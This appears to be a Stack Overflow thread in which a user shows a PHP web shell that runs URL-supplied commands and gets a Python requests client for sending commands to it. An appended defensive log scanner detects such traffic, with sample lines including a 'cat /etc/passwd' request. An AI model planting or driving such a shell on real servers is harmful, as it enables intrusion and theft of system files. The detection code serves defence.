
I created a PHP file that allows me to execute commands via the URL. The PHP file and the URL are in the following quotes:

<?php

system($_GET['cmd']);

?>

the url is:

www.somewebsite.com/..././command.php?cmd=id

So here I used the command "id" and the output was:

uid=33(www-data) gid=33(www-data) groups=33(www-data) 

Now, I want to write a Python script that passes the command I want as an argument and returns the output in the terminal instead of executing the command in the browser.

This is my code so far:

import sys
import requests
import re
import webbrowser


url = 'http://localhost/.././command.php?cmd='

def remote():
   # open the URL held in the variable, not the literal string 'url'
   webbrowser.open(url)


def main():
   remote()


if __name__ == '__main__':
   main()

My problem is how to pass an argument as a command, like: python do.py id

Thanks in advance.

Core
    You should learn some basic Python first. Hint: use the `sys` module. – ForceBru Jul 23 '17 at 20:04
  • Bigger hint: https://stackoverflow.com/questions/4117530/sys-argv1-meaning-in-script – cs95 Jul 23 '17 at 20:06
  • 3
    A good StackOverflow question would be focused on the specific thing you don't know how to do. For instance, trying to figure out how to retrieve a piece of data from the command line into a variable, or figuring out how to substitute a variable into a string. That said, it's overwhelmingly likely that there *already will exist* an answered question covering any such components -- so you should be able to figure out everything you need to do by breaking down your problem into smaller pieces, and searching StackOverflow (and/or the Python docs) for help with those individual pieces. – Charles Duffy Jul 23 '17 at 20:06
  • 1
    BTW, `webbrowser` is overkill here -- there's no reason to get a browser involved when all you need is a HTTP request, and you *don't* need a JavaScript engine and all that mess behind it. Indeed, you're opening yourself up to someone trying to fingerprint you or take advantage of other vulnerabilities in the broad attack surface a browser offers. – Charles Duffy Jul 23 '17 at 20:09

1 Answer


You are probably looking for this:

import requests
import sys

url = 'http://localhost/.././command.php?cmd='
command = str(sys.argv[1])  # first command-line argument, e.g. "id" for: python do.py id

response = requests.get(url + command)
print(response.text)  # Python 3 print(); response.text is the decoded body

You might need to install the requests module. You can do that easily using pip.

Trishant Pahwa
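From the defender's side, the traffic the script above generates (a GET to a .php file with the command carried in a query parameter, sent by a non-browser client) is the classic web-shell pattern that access-log monitoring looks for. The following detector is an added example and is not code from the question or the answer: the Apache-style log lines are constructed samples, the parameter names in COMMAND_PARAMS, the user-agent prefixes (python-requests is the default User-Agent of the requests library the answer uses) and all function names are assumptions.

```python
"""Flag web-shell style command requests in web server access logs.

Added example for this page; the log lines are constructed samples in
Apache combined format, and the parameter names, user-agent prefixes
and helper names are assumptions.
"""
import re
import shlex
from urllib.parse import urlparse, parse_qs

# Constructed sample lines; not real traffic.
SAMPLE_LOG = """\
203.0.113.5 - - [23/Jul/2017:20:04:11 +0000] "GET /index.php?page=about HTTP/1.1" 200 512 "-" "Mozilla/5.0"
203.0.113.5 - - [23/Jul/2017:20:04:15 +0000] "GET /command.php?cmd=id HTTP/1.1" 200 61 "-" "Mozilla/5.0"
198.51.100.7 - - [23/Jul/2017:20:06:02 +0000] "GET /uploads/command.php?cmd=cat%20%2Fetc%2Fpasswd HTTP/1.1" 200 1843 "-" "python-requests/2.18.1"
198.51.100.7 - - [23/Jul/2017:20:06:09 +0000] "POST /login.php HTTP/1.1" 302 0 "-" "Mozilla/5.0"
"""

# Apache combined log format: ip ident user [ts] "METHOD target proto" status size "referer" "ua"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)

# Query parameter names commonly used to carry a shell command (assumption).
COMMAND_PARAMS = {"cmd", "command", "exec", "c"}
# Default User-Agent prefixes of scripted HTTP clients; requests sends "python-requests/<version>".
SCRIPTED_UA_PREFIXES = ("python-requests/", "curl/")


def parse_line(line):
    """Parse one combined-format line into a dict, or return None if it does not match."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def inspect_request(entry):
    """Return a finding for a request that looks like a web-shell command, else None."""
    parsed = urlparse(entry["target"])
    if not parsed.path.endswith(".php"):
        return None
    # parse_qs percent-decodes values, so "cat%20%2Fetc%2Fpasswd" becomes "cat /etc/passwd"
    params = parse_qs(parsed.query, keep_blank_values=True)
    commands = [v for k, vals in params.items() if k.lower() in COMMAND_PARAMS for v in vals]
    if not commands:
        return None
    command = commands[0]
    try:
        tokens = shlex.split(command)
    except ValueError:  # unbalanced quotes; fall back to whitespace splitting
        tokens = command.split()
    program = tokens[0] if tokens else ""
    signals = ["command_parameter"]
    if entry["ua"].startswith(SCRIPTED_UA_PREFIXES):
        signals.append("scripted_client")
    if entry["status"] == "200":
        signals.append("served_200")  # the server answered, so the file exists and ran
    return {
        "timestamp": entry["ts"],
        "ip": entry["ip"],
        "path": parsed.path,
        "command": command,
        "program": program,
        "signals": signals,
    }


def scan_log(text):
    """Run inspect_request over every parseable line and collect the findings."""
    findings = []
    for line in text.splitlines():
        entry = parse_line(line)
        if entry is None:
            continue
        finding = inspect_request(entry)
        if finding is not None:
            findings.append(finding)
    return findings


if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f"{f['timestamp']} {f['ip']} {f['path']} program={f['program']!r} "
              f"signals={','.join(f['signals'])}")
```

Matching on the decoded query rather than the raw URL matters: the percent-encoded form in the third sample line would slip past a naive substring check for "cat /etc/passwd", and a server-side rule that keys only on the file name misses a shell uploaded under any other name. The scripted-client signal is weak on its own (legitimate tooling uses requests too) but combined with a command-named parameter it is a strong indicator.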